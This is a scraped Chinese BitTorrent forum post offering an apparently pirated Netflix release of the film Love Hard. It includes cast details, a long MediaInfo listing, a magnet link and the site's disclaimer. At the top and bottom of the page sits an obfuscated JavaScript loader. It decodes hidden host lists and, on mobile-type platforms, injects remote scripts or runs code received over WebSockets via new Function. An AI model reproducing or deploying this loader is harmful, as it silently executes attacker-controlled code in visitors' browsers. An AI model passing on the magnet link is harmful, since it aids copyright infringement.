爱好难[中文字幕].Love.Hard.2021.1080p.NF.WEB-DL.DDP5.1.Atmos.x264 8.93GB

版主小s 25天前 315

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 爱好难

◎片 名 Love Hard

◎年 代 2021

◎产 地 美国

◎类 别 喜剧 / 爱情

◎语 言 英语

◎上映日期 2021-11-05(美国网络)

◎IMDb链接 https://www.imdb.com/title/tt10752004/

◎豆瓣评分 6.3/10 (379人评价)

◎豆瓣链接 https://movie.douban.com/subject/35178785/

◎片 长 104分钟

◎导 演 赫尔南·吉门尼斯 Hernán Jiménez (id:1112571)

◎编 剧 Daniel Mackey (id:1231390)

◎演 员 妮娜·杜波夫 Nina Dobrev (id:1013763)

欧阳万成 Jimmy O. Yang (id:1340211)

达伦·巴内特 Darren Barnet (id:1436203)

洛奇林·莫罗 Lochlyn Munro (id:1127899)

岑勇康 Harry Shum Jr. (id:1044718)

米凯拉·霍沃 Mikaela Hoover (id:1229185)

丽贝卡·斯塔巴 Rebecca Staab (id:1025355)

马蒂·芬诺乔 Matty Finochio (id:1428520)

詹姆斯·塞托 James Saito (id:1142361)

C.恩斯特·哈斯 C. Ernst Harth (id:1056045)

贾斯汀·沃林顿 Justine Warrington (id:1413644)

肖恩·德伯纳 Sean Depner (id:1398023)

塔卡尤·费舍尔 Takayo Fischer (id:1087216)

迪恩·彼得里夫 Dean Petriw (id:1435449)

帕特里克·罗卡斯 Patrick Roccas (id:1407512)

梅尔·塔克 Mel Tuck (id:1158418)

Alexandra Lainfiesta Alexandra Lainfiesta (id:1438790)

查尔斯·梅尔顿 Charles Melton (id:1389614)

◎标 签 Netflix / 喜剧 / 爱情 / 妮娜·杜波夫 / 2021 / 美国电影 / 美国 / 圣诞

◎简 介

妮娜·杜波夫、欧阳万成、查尔斯·梅尔顿(《河谷镇》)将主演Netflix浪漫喜剧[爱很难](Love Hard,暂译)。Hernán Jiménez执导,Danny Mackey、Rebecca Ewing操刀剧本。影片讲述一个洛杉矶女孩通过约会软件不幸地爱上了一个东海岸的男孩,这个女孩决定在圣诞节给他一个惊喜,而她却发现自己被骗了。但是她真正喜欢的对象其实和她住在同一座城市,骗了她的男孩愿意帮忙撮合他们,但要求女孩在圣诞节假装是他的女朋友。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 73513061848699873222827853167850832769 (0x374E19C83FA02B927753F9A39F464381)

  4. Complete name : [email protected]M.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 8.93 GiB

  8. Duration : 1 h 46 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 12.0 Mb/s

  11. Encoded date : UTC 2021-11-05 15:03:31

  12. Writing application : mkvmerge v44.0.0 ('Domino') 64-bit

  13. Writing library : libebml v1.3.10 + libmatroska v1.5.2


  14. Video

  15. ID : 1

  16. Format : AVC

  17. Format/Info : Advanced Video Codec

  18. Format profile : [email protected]

  19. Format settings : CABAC / 3 Ref Frames

  20. Format settings, CABAC : Yes

  21. Format settings, Reference frames : 3 frames

  22. Codec ID : V_MPEG4/ISO/AVC

  23. Duration : 1 h 46 min

  24. Bit rate mode : Variable

  25. Bit rate : 2 908 kb/s

  26. Nominal bit rate : 3 320 kb/s

  27. Maximum bit rate : 4 980 kb/s

  28. Width : 1 920 pixels

  29. Height : 1 080 pixels

  30. Display aspect ratio : 16:9

  31. Frame rate mode : Constant

  32. Frame rate : 24.000 FPS

  33. Color space : YUV

  34. Chroma subsampling : 4:2:0

  35. Bit depth : 8 bits

  36. Scan type : Progressive

  37. Bits/(Pixel*Frame) : 0.058

  38. Stream size : 2.16 GiB (24%)

  39. Writing library : x264 core 148 r2724 dbe0335

  40. Encoding settings : cabac=1 / ref=3 / deblock=1:0:0 / analyse=0x1:0x111 / me=umh / subme=10 / psy=1 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=24 / chroma_me=1 / trellis=2 / 8x8dct=0 / cqm=0 / deadzone=21,11 / fast_pskip=1 / chroma_qp_offset=-2 / threads=8 / lookahead_threads=1 / sliced_threads=0 / nr=0 / decimate=1 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / stitchable=1 / constrained_intra=0 / bframes=2 / b_pyramid=0 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=250 / keyint_min=24 / scenecut=0 / intra_refresh=0 / rc_lookahead=48 / rc=2pass / mbtree=1 / bitrate=3320 / ratetol=1.0 / qcomp=0.50 / qpmin=6 / qpmax=51 / qpstep=4 / cplxblur=20.0 / qblur=0.5 / vbv_maxrate=4980 / vbv_bufsize=6640 / nal_hrd=vbr / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / aq=1:1.00

  41. Default : Yes

  42. Forced : No


  43. Audio #1

  44. ID : 2

  45. Format : E-AC-3 JOC

  46. Format/Info : Enhanced AC-3 with Joint Object Coding

  47. Commercial name : Dolby Digital Plus with Dolby Atmos

  48. Codec ID : A_EAC3

  49. Duration : 1 h 46 min

  50. Bit rate mode : Constant

  51. Bit rate : 768 kb/s

  52. Channel(s) : 6 channels

  53. Channel layout : L R C LFE Ls Rs

  54. Sampling rate : 48.0 kHz

  55. Frame rate : 31.250 FPS (1536 SPF)

  56. Compression mode : Lossy

  57. Stream size : 585 MiB (6%)

  58. Title : English

  59. Language : English

  60. Service kind : Complete Main

  61. Default : Yes

  62. Forced : No

  63. Complexity index : 16

  64. Number of dynamic objects : 15

  65. Bed channel count : 1 channel

  66. Bed channel configuration : LFE


  67. Audio #2

  68. ID : 3

  69. Format : E-AC-3

  70. Format/Info : Enhanced AC-3

  71. Commercial name : Dolby Digital Plus

  72. Codec ID : A_EAC3

  73. Duration : 1 h 46 min

  74. Bit rate mode : Constant

  75. Bit rate : 640 kb/s

  76. Channel(s) : 6 channels

  77. Channel layout : L R C LFE Ls Rs

  78. Sampling rate : 48.0 kHz

  79. Frame rate : 31.250 FPS (1536 SPF)

  80. Compression mode : Lossy

  81. Stream size : 487 MiB (5%)

  82. Title : Czech

  83. Language : Czech

  84. Service kind : Complete Main

  85. Default : No

  86. Forced : No


  87. Audio #3

  88. ID : 4

  89. Format : E-AC-3

  90. Format/Info : Enhanced AC-3

  91. Commercial name : Dolby Digital Plus

  92. Codec ID : A_EAC3

  93. Duration : 1 h 46 min

  94. Bit rate mode : Constant

  95. Bit rate : 640 kb/s

  96. Channel(s) : 6 channels

  97. Channel layout : L R C LFE Ls Rs

  98. Sampling rate : 48.0 kHz

  99. Frame rate : 31.250 FPS (1536 SPF)

  100. Compression mode : Lossy

  101. Stream size : 487 MiB (5%)

  102. Title : French

  103. Language : French

  104. Service kind : Complete Main

  105. Default : No

  106. Forced : No


  107. Audio #4

  108. ID : 5

  109. Format : E-AC-3

  110. Format/Info : Enhanced AC-3

  111. Commercial name : Dolby Digital Plus

  112. Codec ID : A_EAC3

  113. Duration : 1 h 46 min

  114. Bit rate mode : Constant

  115. Bit rate : 640 kb/s

  116. Channel(s) : 6 channels

  117. Channel layout : L R C LFE Ls Rs

  118. Sampling rate : 48.0 kHz

  119. Frame rate : 31.250 FPS (1536 SPF)

  120. Compression mode : Lossy

  121. Stream size : 487 MiB (5%)

  122. Title : German

  123. Language : German

  124. Service kind : Complete Main

  125. Default : No

  126. Forced : No


  127. Audio #5

  128. ID : 6

  129. Format : E-AC-3

  130. Format/Info : Enhanced AC-3

  131. Commercial name : Dolby Digital Plus

  132. Codec ID : A_EAC3

  133. Duration : 1 h 46 min

  134. Bit rate mode : Constant

  135. Bit rate : 640 kb/s

  136. Channel(s) : 6 channels

  137. Channel layout : L R C LFE Ls Rs

  138. Sampling rate : 48.0 kHz

  139. Frame rate : 31.250 FPS (1536 SPF)

  140. Compression mode : Lossy

  141. Stream size : 487 MiB (5%)

  142. Title : Hindi

  143. Language : Hindi

  144. Service kind : Complete Main

  145. Default : No

  146. Forced : No


  147. Audio #6

  148. ID : 7

  149. Format : E-AC-3

  150. Format/Info : Enhanced AC-3

  151. Commercial name : Dolby Digital Plus

  152. Codec ID : A_EAC3

  153. Duration : 1 h 46 min

  154. Bit rate mode : Constant

  155. Bit rate : 640 kb/s

  156. Channel(s) : 6 channels

  157. Channel layout : L R C LFE Ls Rs

  158. Sampling rate : 48.0 kHz

  159. Frame rate : 31.250 FPS (1536 SPF)

  160. Compression mode : Lossy

  161. Stream size : 487 MiB (5%)

  162. Title : Hungarian

  163. Language : Hungarian

  164. Service kind : Complete Main

  165. Default : No

  166. Forced : No


  167. Audio #7

  168. ID : 8

  169. Format : E-AC-3

  170. Format/Info : Enhanced AC-3

  171. Commercial name : Dolby Digital Plus

  172. Codec ID : A_EAC3

  173. Duration : 1 h 46 min

  174. Bit rate mode : Constant

  175. Bit rate : 640 kb/s

  176. Channel(s) : 6 channels

  177. Channel layout : L R C LFE Ls Rs

  178. Sampling rate : 48.0 kHz

  179. Frame rate : 31.250 FPS (1536 SPF)

  180. Compression mode : Lossy

  181. Stream size : 487 MiB (5%)

  182. Title : Italian

  183. Language : Italian

  184. Service kind : Complete Main

  185. Default : No

  186. Forced : No


  187. Audio #8

  188. ID : 9

  189. Format : E-AC-3

  190. Format/Info : Enhanced AC-3

  191. Commercial name : Dolby Digital Plus

  192. Codec ID : A_EAC3

  193. Duration : 1 h 46 min

  194. Bit rate mode : Constant

  195. Bit rate : 640 kb/s

  196. Channel(s) : 6 channels

  197. Channel layout : L R C LFE Ls Rs

  198. Sampling rate : 48.0 kHz

  199. Frame rate : 31.250 FPS (1536 SPF)

  200. Compression mode : Lossy

  201. Stream size : 487 MiB (5%)

  202. Title : Polish

  203. Language : Polish

  204. Service kind : Complete Main

  205. Default : No

  206. Forced : No


  207. Audio #9

  208. ID : 10

  209. Format : E-AC-3

  210. Format/Info : Enhanced AC-3

  211. Commercial name : Dolby Digital Plus

  212. Codec ID : A_EAC3

  213. Duration : 1 h 46 min

  214. Bit rate mode : Constant

  215. Bit rate : 640 kb/s

  216. Channel(s) : 6 channels

  217. Channel layout : L R C LFE Ls Rs

  218. Sampling rate : 48.0 kHz

  219. Frame rate : 31.250 FPS (1536 SPF)

  220. Compression mode : Lossy

  221. Stream size : 487 MiB (5%)

  222. Title : Brazilian Portuguese

  223. Language : Portuguese

  224. Service kind : Complete Main

  225. Default : No

  226. Forced : No


  227. Audio #10

  228. ID : 11

  229. Format : E-AC-3

  230. Format/Info : Enhanced AC-3

  231. Commercial name : Dolby Digital Plus

  232. Codec ID : A_EAC3

  233. Duration : 1 h 46 min

  234. Bit rate mode : Constant

  235. Bit rate : 640 kb/s

  236. Channel(s) : 6 channels

  237. Channel layout : L R C LFE Ls Rs

  238. Sampling rate : 48.0 kHz

  239. Frame rate : 31.250 FPS (1536 SPF)

  240. Compression mode : Lossy

  241. Stream size : 487 MiB (5%)

  242. Title : Russian

  243. Language : Russian

  244. Service kind : Complete Main

  245. Default : No

  246. Forced : No


  247. Audio #11

  248. ID : 12

  249. Format : E-AC-3

  250. Format/Info : Enhanced AC-3

  251. Commercial name : Dolby Digital Plus

  252. Codec ID : A_EAC3

  253. Duration : 1 h 46 min

  254. Bit rate mode : Constant

  255. Bit rate : 640 kb/s

  256. Channel(s) : 6 channels

  257. Channel layout : L R C LFE Ls Rs

  258. Sampling rate : 48.0 kHz

  259. Frame rate : 31.250 FPS (1536 SPF)

  260. Compression mode : Lossy

  261. Stream size : 487 MiB (5%)

  262. Title : Spanish

  263. Language : Spanish

  264. Service kind : Complete Main

  265. Default : No

  266. Forced : No


  267. Audio #12

  268. ID : 13

  269. Format : E-AC-3

  270. Format/Info : Enhanced AC-3

  271. Commercial name : Dolby Digital Plus

  272. Codec ID : A_EAC3

  273. Duration : 1 h 46 min

  274. Bit rate mode : Constant

  275. Bit rate : 640 kb/s

  276. Channel(s) : 6 channels

  277. Channel layout : L R C LFE Ls Rs

  278. Sampling rate : 48.0 kHz

  279. Frame rate : 31.250 FPS (1536 SPF)

  280. Compression mode : Lossy

  281. Stream size : 487 MiB (5%)

  282. Title : European Spanish

  283. Language : Spanish

  284. Service kind : Complete Main

  285. Default : No

  286. Forced : No


  287. Audio #13

  288. ID : 14

  289. Format : E-AC-3

  290. Format/Info : Enhanced AC-3

  291. Commercial name : Dolby Digital Plus

  292. Codec ID : A_EAC3

  293. Duration : 1 h 46 min

  294. Bit rate mode : Constant

  295. Bit rate : 640 kb/s

  296. Channel(s) : 6 channels

  297. Channel layout : L R C LFE Ls Rs

  298. Sampling rate : 48.0 kHz

  299. Frame rate : 31.250 FPS (1536 SPF)

  300. Compression mode : Lossy

  301. Stream size : 487 MiB (5%)

  302. Title : Thai

  303. Language : Thai

  304. Service kind : Complete Main

  305. Default : No

  306. Forced : No


  307. Audio #14

  308. ID : 15

  309. Format : E-AC-3

  310. Format/Info : Enhanced AC-3

  311. Commercial name : Dolby Digital Plus

  312. Codec ID : A_EAC3

  313. Duration : 1 h 46 min

  314. Bit rate mode : Constant

  315. Bit rate : 640 kb/s

  316. Channel(s) : 6 channels

  317. Channel layout : L R C LFE Ls Rs

  318. Sampling rate : 48.0 kHz

  319. Frame rate : 31.250 FPS (1536 SPF)

  320. Compression mode : Lossy

  321. Stream size : 487 MiB (5%)

  322. Title : Turkish

  323. Language : Turkish

  324. Service kind : Complete Main

  325. Default : No

  326. Forced : No


  327. Text #1

  328. ID : 16

  329. Format : UTF-8

  330. Codec ID : S_TEXT/UTF8

  331. Codec ID/Info : UTF-8 Plain Text

  332. Duration : 1 h 44 min

  333. Bit rate : 126 b/s

  334. Count of elements : 1996

  335. Stream size : 97.1 KiB (0%)

  336. Title : English

  337. Language : English

  338. Default : Yes

  339. Forced : No


  340. Text #2

  341. ID : 17

  342. Format : UTF-8

  343. Codec ID : S_TEXT/UTF8

  344. Codec ID/Info : UTF-8 Plain Text

  345. Duration : 1 h 44 min

  346. Bit rate : 121 b/s

  347. Count of elements : 1561

  348. Stream size : 92.7 KiB (0%)

  349. Title : Arabic

  350. Language : Arabic

  351. Default : No

  352. Forced : No


  353. Text #3

  354. ID : 18

  355. Format : UTF-8

  356. Codec ID : S_TEXT/UTF8

  357. Codec ID/Info : UTF-8 Plain Text

  358. Duration : 1 h 44 min

  359. Bit rate : 73 b/s

  360. Count of elements : 1576

  361. Stream size : 56.1 KiB (0%)

  362. Title : Chinese Simplified

  363. Language : Chinese

  364. Default : No

  365. Forced : No


  366. Text #4

  367. ID : 19

  368. Format : UTF-8

  369. Codec ID : S_TEXT/UTF8

  370. Codec ID/Info : UTF-8 Plain Text

  371. Duration : 1 h 44 min

  372. Bit rate : 74 b/s

  373. Count of elements : 1588

  374. Stream size : 56.8 KiB (0%)

  375. Title : Chinese Traditional

  376. Language : Chinese

  377. Default : No

  378. Forced : No


  379. Text #5

  380. ID : 20

  381. Format : UTF-8

  382. Codec ID : S_TEXT/UTF8

  383. Codec ID/Info : UTF-8 Plain Text

  384. Duration : 1 h 44 min

  385. Bit rate : 69 b/s

  386. Count of elements : 1489

  387. Stream size : 53.0 KiB (0%)

  388. Title : Croatian

  389. Language : Croatian

  390. Default : No

  391. Forced : No


  392. Text #6

  393. ID : 21

  394. Format : UTF-8

  395. Codec ID : S_TEXT/UTF8

  396. Codec ID/Info : UTF-8 Plain Text

  397. Duration : 1 h 44 min

  398. Bit rate : 73 b/s

  399. Count of elements : 1571

  400. Stream size : 56.5 KiB (0%)

  401. Title : Czech

  402. Language : Czech

  403. Default : No

  404. Forced : No


  405. Text #7

  406. ID : 22

  407. Format : UTF-8

  408. Codec ID : S_TEXT/UTF8

  409. Codec ID/Info : UTF-8 Plain Text

  410. Duration : 1 h 44 min

  411. Bit rate : 65 b/s

  412. Count of elements : 1469

  413. Stream size : 49.9 KiB (0%)

  414. Title : Danish

  415. Language : Danish

  416. Default : No

  417. Forced : No


  418. Text #8

  419. ID : 23

  420. Format : UTF-8

  421. Codec ID : S_TEXT/UTF8

  422. Codec ID/Info : UTF-8 Plain Text

  423. Duration : 1 h 44 min

  424. Bit rate : 64 b/s

  425. Count of elements : 1355

  426. Stream size : 49.6 KiB (0%)

  427. Title : Dutch

  428. Language : Dutch

  429. Default : No

  430. Forced : No


  431. Text #9

  432. ID : 24

  433. Format : UTF-8

  434. Codec ID : S_TEXT/UTF8

  435. Codec ID/Info : UTF-8 Plain Text

  436. Duration : 1 h 44 min

  437. Bit rate : 71 b/s

  438. Count of elements : 1514

  439. Stream size : 54.6 KiB (0%)

  440. Title : Finnish

  441. Language : Finnish

  442. Default : No

  443. Forced : No


  444. Text #10

  445. ID : 25

  446. Format : UTF-8

  447. Codec ID : S_TEXT/UTF8

  448. Codec ID/Info : UTF-8 Plain Text

  449. Duration : 1 h 44 min

  450. Bit rate : 71 b/s

  451. Count of elements : 1564

  452. Stream size : 55.0 KiB (0%)

  453. Title : French

  454. Language : French

  455. Default : No

  456. Forced : No


  457. Text #11

  458. ID : 26

  459. Format : UTF-8

  460. Codec ID : S_TEXT/UTF8

  461. Codec ID/Info : UTF-8 Plain Text

  462. Duration : 1 h 44 min

  463. Bit rate : 72 b/s

  464. Count of elements : 1568

  465. Stream size : 55.8 KiB (0%)

  466. Title : German

  467. Language : German

  468. Default : No

  469. Forced : No


  470. Text #12

  471. ID : 27

  472. Format : UTF-8

  473. Codec ID : S_TEXT/UTF8

  474. Codec ID/Info : UTF-8 Plain Text

  475. Duration : 1 h 44 min

  476. Bit rate : 118 b/s

  477. Count of elements : 1566

  478. Stream size : 90.8 KiB (0%)

  479. Title : Greek

  480. Language : Greek

  481. Default : No

  482. Forced : No


  483. Text #13

  484. ID : 28

  485. Format : UTF-8

  486. Codec ID : S_TEXT/UTF8

  487. Codec ID/Info : UTF-8 Plain Text

  488. Duration : 1 h 44 min

  489. Bit rate : 120 b/s

  490. Count of elements : 1560

  491. Stream size : 92.0 KiB (0%)

  492. Title : Hebrew

  493. Language : Hebrew

  494. Default : No

  495. Forced : No


  496. Text #14

  497. ID : 29

  498. Format : UTF-8

  499. Codec ID : S_TEXT/UTF8

  500. Codec ID/Info : UTF-8 Plain Text

  501. Duration : 1 h 44 min

  502. Bit rate : 74 b/s

  503. Count of elements : 1556

  504. Stream size : 56.8 KiB (0%)

  505. Title : Hungarian

  506. Language : Hungarian

  507. Default : No

  508. Forced : No


  509. Text #15

  510. ID : 30

  511. Format : UTF-8

  512. Codec ID : S_TEXT/UTF8

  513. Codec ID/Info : UTF-8 Plain Text

  514. Duration : 1 h 44 min

  515. Bit rate : 67 b/s

  516. Count of elements : 1540

  517. Stream size : 51.8 KiB (0%)

  518. Title : Indonesian

  519. Language : Indonesian

  520. Default : No

  521. Forced : No


  522. Text #16

  523. ID : 31

  524. Format : UTF-8

  525. Codec ID : S_TEXT/UTF8

  526. Codec ID/Info : UTF-8 Plain Text

  527. Duration : 1 h 44 min

  528. Bit rate : 69 b/s

  529. Count of elements : 1566

  530. Stream size : 52.9 KiB (0%)

  531. Title : Italian

  532. Language : Italian

  533. Default : No

  534. Forced : No


  535. Text #17

  536. ID : 32

  537. Format : UTF-8

  538. Codec ID : S_TEXT/UTF8

  539. Codec ID/Info : UTF-8 Plain Text

  540. Duration : 1 h 44 min

  541. Bit rate : 73 b/s

  542. Count of elements : 1663

  543. Stream size : 56.6 KiB (0%)

  544. Title : Japanese

  545. Language : Japanese

  546. Default : No

  547. Forced : No


  548. Text #18

  549. ID : 33

  550. Format : UTF-8

  551. Codec ID : S_TEXT/UTF8

  552. Codec ID/Info : UTF-8 Plain Text

  553. Duration : 1 h 44 min

  554. Bit rate : 85 b/s

  555. Count of elements : 1615

  556. Stream size : 65.5 KiB (0%)

  557. Title : Korean

  558. Language : Korean

  559. Default : No

  560. Forced : No


  561. Text #19

  562. ID : 34

  563. Format : UTF-8

  564. Codec ID : S_TEXT/UTF8

  565. Codec ID/Info : UTF-8 Plain Text

  566. Duration : 1 h 44 min

  567. Bit rate : 66 b/s

  568. Count of elements : 1570

  569. Stream size : 51.0 KiB (0%)

  570. Title : Malay

  571. Language : Malay

  572. Default : No

  573. Forced : No


  574. Text #20

  575. ID : 35

  576. Format : UTF-8

  577. Codec ID : S_TEXT/UTF8

  578. Codec ID/Info : UTF-8 Plain Text

  579. Duration : 1 h 44 min

  580. Bit rate : 67 b/s

  581. Count of elements : 1520

  582. Stream size : 51.4 KiB (0%)

  583. Title : Norwegian Bokmal

  584. Language : Norwegian Bokmal

  585. Default : No

  586. Forced : No


  587. Text #21

  588. ID : 36

  589. Format : UTF-8

  590. Codec ID : S_TEXT/UTF8

  591. Codec ID/Info : UTF-8 Plain Text

  592. Duration : 1 h 44 min

  593. Bit rate : 65 b/s

  594. Count of elements : 1596

  595. Stream size : 50.5 KiB (0%)

  596. Title : Polish

  597. Language : Polish

  598. Default : No

  599. Forced : No


  600. Text #22

  601. ID : 37

  602. Format : UTF-8

  603. Codec ID : S_TEXT/UTF8

  604. Codec ID/Info : UTF-8 Plain Text

  605. Duration : 1 h 44 min

  606. Bit rate : 73 b/s

  607. Count of elements : 1533

  608. Stream size : 56.6 KiB (0%)

  609. Title : Portuguese

  610. Language : Portuguese

  611. Default : No

  612. Forced : No


  613. Text #23

  614. ID : 38

  615. Format : UTF-8

  616. Codec ID : S_TEXT/UTF8

  617. Codec ID/Info : UTF-8 Plain Text

  618. Duration : 1 h 44 min

  619. Bit rate : 66 b/s

  620. Count of elements : 1556

  621. Stream size : 50.6 KiB (0%)

  622. Title : Brazilian Portuguese

  623. Language : Portuguese

  624. Default : No

  625. Forced : No


  626. Text #24

  627. ID : 39

  628. Format : UTF-8

  629. Codec ID : S_TEXT/UTF8

  630. Codec ID/Info : UTF-8 Plain Text

  631. Duration : 1 h 44 min

  632. Bit rate : 74 b/s

  633. Count of elements : 1560

  634. Stream size : 57.2 KiB (0%)

  635. Title : Romanian

  636. Language : Romanian

  637. Default : No

  638. Forced : No


  639. Text #25

  640. ID : 40

  641. Format : UTF-8

  642. Codec ID : S_TEXT/UTF8

  643. Codec ID/Info : UTF-8 Plain Text

  644. Duration : 1 h 44 min

  645. Bit rate : 113 b/s

  646. Count of elements : 1560

  647. Stream size : 86.9 KiB (0%)

  648. Title : Russian

  649. Language : Russian

  650. Default : No

  651. Forced : No


  652. Text #26

  653. ID : 41

  654. Format : UTF-8

  655. Codec ID : S_TEXT/UTF8

  656. Codec ID/Info : UTF-8 Plain Text

  657. Duration : 1 h 44 min

  658. Bit rate : 69 b/s

  659. Count of elements : 1670

  660. Stream size : 53.4 KiB (0%)

  661. Title : Spanish

  662. Language : Spanish

  663. Default : No

  664. Forced : No


  665. Text #27

  666. ID : 42

  667. Format : UTF-8

  668. Codec ID : S_TEXT/UTF8

  669. Codec ID/Info : UTF-8 Plain Text

  670. Duration : 1 h 44 min

  671. Bit rate : 69 b/s

  672. Count of elements : 1510

  673. Stream size : 53.1 KiB (0%)

  674. Title : European Spanish

  675. Language : Spanish

  676. Default : No

  677. Forced : No


  678. Text #28

  679. ID : 43

  680. Format : UTF-8

  681. Codec ID : S_TEXT/UTF8

  682. Codec ID/Info : UTF-8 Plain Text

  683. Duration : 1 h 44 min

  684. Bit rate : 67 b/s

  685. Count of elements : 1523

  686. Stream size : 51.4 KiB (0%)

  687. Title : Swedish

  688. Language : Swedish

  689. Default : No

  690. Forced : No


  691. Text #29

  692. ID : 44

  693. Format : UTF-8

  694. Codec ID : S_TEXT/UTF8

  695. Codec ID/Info : UTF-8 Plain Text

  696. Duration : 1 h 44 min

  697. Bit rate : 184 b/s

  698. Count of elements : 1571

  699. Stream size : 141 KiB (0%)

  700. Title : Thai

  701. Language : Thai

  702. Default : No

  703. Forced : No


  704. Text #30

  705. ID : 45

  706. Format : UTF-8

  707. Codec ID : S_TEXT/UTF8

  708. Codec ID/Info : UTF-8 Plain Text

  709. Duration : 1 h 44 min

  710. Bit rate : 69 b/s

  711. Count of elements : 1549

  712. Stream size : 52.9 KiB (0%)

  713. Title : Turkish

  714. Language : Turkish

  715. Default : No

  716. Forced : No


  717. Text #31

  718. ID : 46

  719. Format : UTF-8

  720. Codec ID : S_TEXT/UTF8

  721. Codec ID/Info : UTF-8 Plain Text

  722. Duration : 1 h 44 min

  723. Bit rate : 108 b/s

  724. Count of elements : 1556

  725. Stream size : 82.9 KiB (0%)

  726. Title : Ukrainian

  727. Language : Ukrainian

  728. Default : No

  729. Forced : No


  730. Text #32

  731. ID : 47

  732. Format : UTF-8

  733. Codec ID : S_TEXT/UTF8

  734. Codec ID/Info : UTF-8 Plain Text

  735. Duration : 1 h 44 min

  736. Bit rate : 96 b/s

  737. Count of elements : 1512

  738. Stream size : 74.2 KiB (0%)

  739. Title : Vietnamese

  740. Language : Vietnamese

  741. Default : No

  742. Forced : No




复制代码


TAGS 喜剧 爱情

磁力链:
  • magnet:?xt=urn:btih:A7DF6B2659C20F0A2184F8628F173A9FBEF0E001

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};